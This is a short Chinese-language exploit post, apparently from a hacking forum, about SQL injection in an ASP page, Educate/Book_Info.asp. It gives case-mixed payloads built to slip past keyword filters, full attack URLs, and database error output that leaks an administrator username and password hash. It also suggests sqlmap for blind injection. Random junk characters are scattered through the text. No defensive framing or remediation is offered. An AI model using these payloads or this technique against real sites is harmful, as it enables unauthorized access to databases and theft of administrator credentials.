漏洞出现在Educate/Book_Info.asp
* I: O! s( [+ K5 Y! C) u ) L5 y5 f1 w: B0 Z5 m) Z
此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
4 w; G2 x2 } ?' M% E" h
: E- Y, O" K. ?/ L3 T" Nexp:如下
6 `0 {$ A0 P4 P5 f查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)7 c. w( s0 E* F% ]* U+ H$ b
查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)- D7 D- j1 i$ C$ M0 |$ ]
" \6 o- }. V# }2 `1 f: I+ [http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)& f$ R8 T8 n0 U' ]
' l6 B+ e) \5 n5 @
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
3 L+ U" I! ]" n2 k # A, |/ x! H# b7 Q) Q* t% V4 B0 Q
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。0 c- y5 R9 ?2 G! R. V; K/ |
# G* H* Y& C! c) g f$ K# C
/Educate/Book_Info.asp,行 8
1 [) l) m5 F$ v$ Z! X9 |, Z
/ l `* m. S; q1 S( i0 Uhttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
$ c1 G6 h! z, {) @ # x3 o- d( V- F) S/ I+ c+ y
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'3 T% ?* ]/ f" V9 S/ g: P
" w& c9 V; J0 ^2 ?2 v* X) u将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。
+ [) z* z4 o6 C& S6 O- `$ N" s
; S; E; c* ]# V: k' W5 O" V/Educate/Book_Info.asp,行 81 f' d0 e3 d6 G) A
|